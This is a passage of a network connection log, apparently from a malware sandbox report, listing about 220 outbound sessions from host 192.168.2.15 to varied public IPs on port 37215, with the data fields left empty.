                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18611192.168.2.1545010222.43.79.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18612192.168.2.154305637.105.59.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18613192.168.2.155556245.83.111.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18614192.168.2.1555470121.130.248.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18615192.168.2.1545984190.142.185.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18616192.168.2.1543502138.65.228.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18617192.168.2.1539586121.223.58.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18618192.168.2.1536292190.92.144.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18619192.168.2.153801241.54.174.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18620192.168.2.1551070222.62.177.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18621192.168.2.1547556197.40.73.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18622192.168.2.155585294.53.113.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18623192.168.2.154876641.8.98.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18624192.168.2.1532864121.17.42.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18625192.168.2.1559860122.87.86.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18626192.168.2.1537078197.162.21.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18627192.168.2.1542898181.206.226.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18628192.168.2.1545766186.113.13.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18629192.168.2.1545648222.44.88.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18630192.168.2.1541566190.182.76.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18631192.168.2.1555922181.66.48.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18632192.168.2.1543644222.167.181.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18633192.168.2.1541642138.62.139.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18634192.168.2.154732096.66.254.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18635192.168.2.1553492181.86.175.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18636192.168.2.153642431.173.80.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18637192.168.2.1557638122.33.194.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18638192.168.2.1559994190.71.236.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18639192.168.2.1553270181.14.30.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18640192.168.2.153343294.77.196.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18641192.168.2.1553562122.229.83.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18642192.168.2.154913894.162.47.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18643192.168.2.1547806138.12.128.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18644192.168.2.1550452222.144.111.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18645192.168.2.154283245.155.153.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18646192.168.2.153307841.62.131.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18647192.168.2.1542852138.253.215.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18648192.168.2.156054694.3.213.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18649192.168.2.1552360157.183.111.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18650192.168.2.1552848122.173.212.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18651192.168.2.1536172197.195.53.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18652192.168.2.1550164190.103.160.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18653192.168.2.1547608122.109.26.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18654192.168.2.1538304197.210.14.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18655192.168.2.1558156222.216.208.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18656192.168.2.1549484138.41.174.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18657192.168.2.1553506102.116.145.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18658192.168.2.1535496190.2.75.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18659192.168.2.153768241.246.10.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18660192.168.2.1548528121.159.3.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18661192.168.2.1537410157.132.220.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18662192.168.2.1549808102.12.125.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18663192.168.2.1549620190.210.152.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18664192.168.2.1554174156.151.208.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18665192.168.2.1553534157.134.42.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18666192.168.2.1553182186.215.31.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18667192.168.2.1558400186.18.208.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18668192.168.2.1555564222.167.93.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18669192.168.2.154734037.96.156.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18670192.168.2.155545241.199.71.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18671192.168.2.1548702156.174.234.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18672192.168.2.1560214190.229.203.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18673192.168.2.153947441.14.205.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18674192.168.2.1540598197.77.145.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18675192.168.2.1556898156.140.27.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18676192.168.2.1550696181.142.39.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18677192.168.2.154554841.74.164.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18678192.168.2.1557778102.163.57.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18679192.168.2.154629645.146.228.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18680192.168.2.1541662181.229.221.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18681192.168.2.1559712190.23.173.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18682192.168.2.1544778190.125.221.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18683192.168.2.154673641.146.3.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18684192.168.2.1555494177.154.202.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18685192.168.2.1553846186.249.107.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18686192.168.2.1560076121.73.56.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18687192.168.2.155000245.8.136.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18688192.168.2.1534076138.243.221.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18689192.168.2.1537750190.185.167.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18690192.168.2.1555104181.243.68.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18691192.168.2.154432294.63.147.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18692192.168.2.1543242186.208.147.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18693192.168.2.154579631.16.94.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18694192.168.2.1539028110.143.181.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18695192.168.2.1551116222.45.155.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18696192.168.2.155270662.207.170.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18697192.168.2.1553752121.44.46.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18698192.168.2.1552004186.51.176.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18699192.168.2.1559642156.13.135.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18700192.168.2.1540978197.160.236.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18701192.168.2.1536432156.51.99.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18702192.168.2.1538066186.204.96.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18703192.168.2.1547564181.91.58.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18704192.168.2.1537562105.120.55.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18705192.168.2.156063894.248.84.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18706192.168.2.154910231.149.145.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18707192.168.2.1539248156.13.72.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18708192.168.2.155952431.184.177.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18709192.168.2.156039641.29.15.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18710192.168.2.1539868156.206.41.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18711192.168.2.1546190138.101.7.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18712192.168.2.155949445.109.21.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18713192.168.2.1533992156.36.13.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18714192.168.2.1552316197.233.224.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18715192.168.2.1540030222.69.127.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18716192.168.2.1535508181.250.182.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18717192.168.2.155188831.50.182.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18718192.168.2.1554454122.98.251.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18719192.168.2.1556014121.175.64.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18720192.168.2.1558234157.193.49.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18721192.168.2.155474694.61.149.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18722192.168.2.1556492186.6.72.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18723192.168.2.1547070122.127.8.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18724192.168.2.1541822156.244.25.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18725192.168.2.155782031.185.2.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18726192.168.2.1538572190.203.252.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18727192.168.2.1548558190.251.42.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18728192.168.2.1555256181.100.67.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18729192.168.2.153554241.43.139.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18730192.168.2.155468841.47.140.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18731192.168.2.1559724181.159.224.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18732192.168.2.1534668186.88.200.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18733192.168.2.1541518181.141.114.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18734192.168.2.1544956197.120.170.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18735192.168.2.1541376122.113.50.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18736192.168.2.1539746102.114.152.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18737192.168.2.153478845.58.39.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18738192.168.2.153708041.115.184.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18739192.168.2.1537080138.26.43.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18740192.168.2.1554650102.149.232.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18741192.168.2.153774694.90.207.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18742192.168.2.155523494.221.91.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18743192.168.2.1535482156.230.251.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18744192.168.2.155169641.19.42.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18745192.168.2.15335189.244.36.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18746192.168.2.1537462190.139.132.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18747192.168.2.1552934156.33.127.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18748192.168.2.1551104102.2.72.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18749192.168.2.153753637.88.183.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18750192.168.2.154239631.2.95.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18751192.168.2.1537816222.192.4.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18752192.168.2.155855445.167.158.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18753192.168.2.1558424156.118.125.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18754192.168.2.1558232186.225.56.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18755192.168.2.1555094197.23.144.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18756192.168.2.1541946121.242.184.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18757192.168.2.1556652222.202.47.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18758192.168.2.1535564181.199.113.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18759192.168.2.1535058121.106.168.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18760192.168.2.154025441.118.252.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18761192.168.2.1557244121.163.232.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18762192.168.2.1554800138.116.193.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18763192.168.2.153673894.130.183.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18764192.168.2.154267237.58.165.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18765192.168.2.154939831.32.141.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18766192.168.2.1551606222.226.72.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18767192.168.2.1552766122.152.207.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18768192.168.2.1543362222.103.58.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18769192.168.2.1551774102.86.245.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18770192.168.2.155013631.97.44.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18771192.168.2.1546496138.199.142.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18772192.168.2.1543364197.204.205.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18773192.168.2.1535848102.31.231.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18774192.168.2.1557976121.32.31.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18775192.168.2.155819437.255.63.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18776192.168.2.1559314181.245.56.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18777192.168.2.1560226122.108.11.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18778192.168.2.1536706121.18.241.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18779192.168.2.155219441.64.193.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18780192.168.2.1551796197.100.227.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18781192.168.2.1543162122.18.49.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18782192.168.2.1544052121.142.9.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18783192.168.2.1552600222.222.238.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18784192.168.2.154707641.132.235.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18785192.168.2.1549350122.112.74.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18786192.168.2.1539512197.210.252.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18787192.168.2.1559308186.56.172.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18788192.168.2.153477845.50.230.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18789192.168.2.153413077.211.182.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18790192.168.2.1551670222.28.111.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18791192.168.2.154296431.84.89.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18792192.168.2.1533284121.239.132.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18793192.168.2.1550746156.213.46.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18794192.168.2.1534900222.229.20.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18795192.168.2.1560242110.63.13.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18796192.168.2.153541445.134.5.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18797192.168.2.1541790102.203.72.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18798192.168.2.154243494.77.159.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18799192.168.2.1556810122.102.56.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18800192.168.2.1543882156.190.115.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18801192.168.2.153563845.250.20.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18802192.168.2.1545202186.1.30.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18803192.168.2.1556372123.102.27.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18804192.168.2.1558796102.5.140.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18805192.168.2.1543196222.47.80.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18806192.168.2.1537806197.33.32.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18807192.168.2.1549240157.180.234.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18808192.168.2.1534440138.68.56.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18809192.168.2.1553552138.176.25.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18810192.168.2.1548360222.202.51.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18811192.168.2.1551916177.146.119.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18812192.168.2.1550254121.141.145.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18813192.168.2.155235037.103.188.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18814192.168.2.1544016157.49.10.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18815192.168.2.1556960122.88.4.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18816192.168.2.1548946222.192.182.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18817192.168.2.1554672122.100.148.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18818192.168.2.155856094.156.133.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18819192.168.2.1536658181.211.2.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18820192.168.2.155486094.163.235.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18821192.168.2.1535920122.112.213.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18822192.168.2.1557866122.179.15.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18823192.168.2.1541126222.16.19.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18824192.168.2.1543566102.20.11.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18825192.168.2.1553584186.85.213.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18826192.168.2.155665631.221.160.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18827192.168.2.1549996156.214.35.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18828192.168.2.1543026197.132.203.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
